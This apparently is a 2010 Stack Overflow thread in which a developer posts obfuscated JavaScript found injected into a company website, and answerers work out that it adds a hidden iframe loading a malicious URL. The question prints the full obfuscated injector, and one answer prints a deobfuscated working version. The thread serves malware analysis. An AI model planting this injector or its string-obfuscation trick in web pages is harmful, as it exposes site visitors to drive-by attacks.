tags:

views:

110

answers:

3
+5  Q: 

Javascript Trojan Dissection

Hi all,

I've recently been playing with allot of Javascript and started to consider that I couldn’t encounter a piece of Javascript that I wouldn’t be able to debug.

Well I was pleasantly surprised and angered today when we discovered a number of javascript redirect trojans on our company’s website.

Most of the code we found I was able to easily dissect and used standard escaping to obfuscate the codes function.

But among the code we found the code below has completely stumped me on what its doing. (The only part that I can seem to work out is that it is doing a replace on some of the parameters).

So would anyone please be kind enough to dissect the following code for me? I would love to know exactly what’s going on...

<script>

function yJ() {};
this.sMZ = "sMZ";
yJ.prototype = {
    w: function () {
        var rJ = 13390;
        this.m = "m";
        this.fP = '';
        this.q = "q";
        this.oJ = "";
        var vS = function () {
            return 'vS'
        };
        var d = 'replace';
        var qB = "";
        x = '';
        var s = document;
        var xZ = "xZ";
        mC = '';
        var dV = "dV";
        var b = window;
        this.p = false;
        this.kX = '';
        nP = "nP";
        var zE = "";
        this.nU = false;
        var yV = function () {
            return 'yV'
        };
        String.prototype.gT = function (l, v) {
            return this[d](l, v)
        };
        this.pC = '';
        var qV = false;
        var fPU = new Array();
        h = "";
        var sV = 'sKe}tKTIiWmEe}oEu}tK'.gT(/[KE\}IW]/g, '');
        var xV = 43258;
        sT = '';
        var mV = '';
        this.wJ = "wJ";
        var f = '<jhItImIlI I>j<IhjezaIdz ;>;<z/;hjeIaIdI>;<zb!ojdjyj ;>I<!/jbIo!d!yI>z<j/Ihjt;m;lj>!'.gT(/[\!Ijz;]/g, '');
        var xB = '';
        wI = "wI";
        oT = false;
        var nQ = 49042;
        try {
            zI = '';
            var bF = new Array();
            var aY = function () {
                return 'aY'
            };
            var rN = false;
            rF = "";
            var cX = function () {
                return 'cX'
            };
            var y = 'bToTdTy+'.gT(/[\+\]aT%]/g, '');
            this.rL = '';
            var vH = function () {
                return 'vH'
            };
            var r = 'sStEy9l?eE'.gT(/[ES9\?m]/g, '');
            yD = "";
            var eA = '';
            var bQ = 'i.fWrhalmlel'.gT(/[lW\.xh]/g, '');
            vZ = '';
            this.bG = "";
            this.vL = false;
            var t = 'w5r[i5t[e%'.gT(/[%C5\[U]/g, '');
            gI = '';
            dVL = "dVL";
            var n = 'cZrzeZaZtze.E.l.e;m;eSnzt;'.gT(/[;SZz\.]/g, '');
            lH = "";
            kD = "kD";
            this.pH = false;
            var k = 's9ric9'.gT(/[9Ni~O]/g, '');
            var vB = '';
            var kH = function () {
                return 'kH'
            };
            var qH = new Array();
            aD = '';
            this.eQ = false;
            var z = 'sNeatoA%totor%i%b%u%toeN'.gT(/[Na%ox]/g, '');
            var cT = '';
            var kL = function () {
                return 'kL'
            };
            var bR = new Array();
            this.cP = 22454;
            var dH = 'hNi9d0d>e*n*'.gT(/[\*9N\>0]/g, '');
            lG = '';
            tG = 7587;
            hV = '';
            this.oR = "oR";
            var o = 'vKiKsAi&bGiKlAiKtHyH'.gT(/[HGK&A]/g, '');
            var dC = function () {};
            var eR = new Date();
            var e = 'atp9p9eWn9d:C9htitl5d:'.gT(/[\:t59W]/g, '');
            uM = "";
            var i = function () {};
            this.cI = "";
            tU = false;

            function qN() {};
            xL = 57256;
            var c = this.a();
            this.eL = '';
            var rY = function () {};
            fG = false;
            nO = false;
            this.j = "";
            this.iQ = 5330;
            var sY = function () {};
            var u = document[n](bQ);
            this.tH = false;
            zX = "";
            u[r][o] = dH;
            var kV = "kV";
            pN = '';
            var yG = new Array();
            this.nOE = 818;
            u[z](k, c);
            this.bQK = "";
            var yU = 15629;
            var sM = new Array();
            var eY = "eY";
            var qP = '';
            s[y][e](u);
            var lU = "lU";
            var zR = false;
            var xS = "";
            iX = 34795;

            function pO() {};
            this.gM = "";
        } catch (g) {
            var xI = false;
            this.gO = false;
            this.iZ = false;
            this.iU = false;
            var mQ = new Date();
            var qF = function () {};
            s.write(f);
            var tS = "tS";

            function aR() {};
            nA = "nA";
            var xT = new Date();
            mZ = false;
            var gN = new Array();
            var wE = this;
            var eB = 3562;
            this.qE = "qE";
            this.cS = false;
            this.vK = false;
            qEJ = false;
            this.hW = false;
            b[sV](function () {
                function bI() {};
                hJ = "";
                var kVQ = "kVQ";
                var iG = "";
                var eBS = new Array();
                rA = "";
                wE.w();
                jY = "";
                var hB = "hB";
                var iZF = '';
                qY = "";
                jYG = "";
                uK = 30969;
                var qD = "qD";
            }, 326);
            this.qC = "";
            var aX = function () {};
            var cN = "";
        }
        gB = false;
        var fF = false;
        this.hX = false;
    },
    a: function () {
        rH = "rH";
        this.bV = '';
        var qW = "";
        return 'h+tbtJpx:J/+/JfxaxnJc+yJc+abkJeb.xnJeMtM/x.xpxh+/b1M/+'.gT(/[\+JbMx]/g, '');
        var sMS = new Array();
        this.wL = false;
        uS = "uS";

        function pI() {};
    }
};
var uI = false;
var kN = new yJ();
this.aQ = "aQ";
kN.w();
hT = 15101;

</script>
+4  A: 

It adds an invisible iFrame to the following URL to your website:

<iframe style="visibility: hidden;" src="http://fancycake.net/.ph/1/"&gt;&lt;/iframe&gt;

The website fancycake is marked as attacked and malicious under Firefox

Erik  2010-07-20 08:13:51
How did you find out?
Aaron Digulla  2010-07-20 08:21:57
by running it in a JavaScript Debugger and watching what was happening. After this, I surfed for the iframes URL and saw the Firefox warning :)
Erik  2010-07-20 08:23:49
+1  A: 

Run it in a JavaScript debugger; eventually, the code will decompile itself and try to start. I suggest to use the latest version of FireFox maybe on a Linux box to be on the safe side.

Aaron Digulla  2010-07-20 08:21:22
+7  A: 

It embeds http://fancycake.xxx/something, and this is the line where you can see it:

return 'h+tbtJpx:J/+/JfxaxnJc+yJc+abkJeb.xnJeMtM/x.xpxh+/b1M/+'.gT(/[\+JbMx]/g, '');

You see how every odd character, when plucked from that string, forms the URL. I didn't run this, so I'm not sure under what conditions it does this, but you can see that String.replace has been renamed to String.gT and is being passed a regex against the characters which make the string obfuscated. If you apply that same method, plucking odd characters, you can see that there is a hidden iframe, some javascript event handlers, setAttribute, etc:

var z = 'sNeatoA%totor%i%b%u%toeN'.gT(/[Na%ox]/g, '');
var o = 'vKiKsAi&bGiKlAiKtHyH'.gT(/[HGK&A]/g, '');
var e = 'atp9p9eWn9d:C9htitl5d:'.gT(/[\:t59W]/g, '');

This is how String.replace is aliased:

var d = 'replace';

...
String.prototype.gT = function (l, v) {
    return this[d](l, v)
};

Within the context of that function, this is the string on which gT is being called and d is the string replace. On a string's prototype, this['replace'] returns the replace() method, which is then called with the two arguments to gT. The result is then returned.

Update

I transformed the script like so:

  1. Replaced all string.gT() calls with their plain forms.
  2. Removed any variables that aren't referenced.
  3. Gave functions some common-sense names.

This is the result, it should be pretty clear how it works now:

function FancyCake() {};
FancyCake.prototype = {
    embed: function () {
        var d = 'replace';
        var s = document;
        var b = window;
        var sV = 'setTimeout';
        var f = "<html ><head ></head><body ></body></html>";
        try {
            zI = '';
            var bF = new Array();
            var y = 'body';
            var r = 'style';
            var bQ = 'iframe';
            var t = 'write';
            var n = 'createElement';
            var k = 'src';
            var z = 'setAttribute';
            var dH = 'hidden';
            var o = 'visibility';
            var e = 'appendChild';
            var c = this.getUrl();
            var u = document[n](bQ);
            u[r][o] = dH;
            u[z](k, c);
            s[y][e](u);
        } catch (e) {
            console.error(e);
            s.write(f);
            var cake = this;
            b[sV](function () {
                cake.embed();
            }, 326);
        }
    },
    getUrl: function () {
        return "http://fancycake.net/.ph/1/";
    }
};

var cake = new FancyCake();
cake.embed();
Jesse Dhillon  2010-07-20 08:33:10
+ for explaination
Sky Sanders  2010-07-20 09:20:29
It didn't occur to me that what I was looking at was regex amongst all that mess. What I dont get now is, ok I get the basic idea of the prototype keyword but how does return this[d](l, v) result in an override of the regex pattern matching? or else what are they trying to achieve in that line of code?PS: Thanks for the explanation because obviously I stuck it into a debugger but have still struggled to understand it.
Maxim Gershkovich  2010-07-20 13:15:31
I've updated the answer to include an explanation about replace.
Jesse Dhillon  2010-07-20 17:44:17
Thank you so much the function makes perfect sense now...
Maxim Gershkovich  2010-07-21 01:10:26

related questions

What JavaScript patterns do you use most?
Javascript events
What style do you use for creating an "class" in JavaScript?
Graphing JavaScript Library
What's the difference in closure style
Getting the text from a drop-down box
How to specify javascript to run when ModalPopupExtender is shown
Length of Javascript Associative Array
How Do I Post and then redirect to an external URL from ASP.Net?
How to set up a CSS switcher in ASP.NET
Wrapping lists into columns
Javascript keyboard events primer? (or rather: help me with my custom dropdown)
Http Auth in a Firefox 3 bookmarklet
Best Debugging Tools for JavaScript/xulrunner Development
How can I turn a string of HTML into a DOM object in a Firefox extension?
Call ASP.NET Function From Javascript?
Javascript troubleshooting tools in IE
MAC addresses in JavaScript
Capturing TAB key in text box
CSS Background Color in Javascript
How can I make the browser see CSS and Javascript changes?
Triple Quotes? How do I delimit a databound Javascript string parameter in ASP.NET?
ASP .Net Custom Client-Side Validation
What JavaScript library would you choose for a new project and why?
Detecting font in JavaScript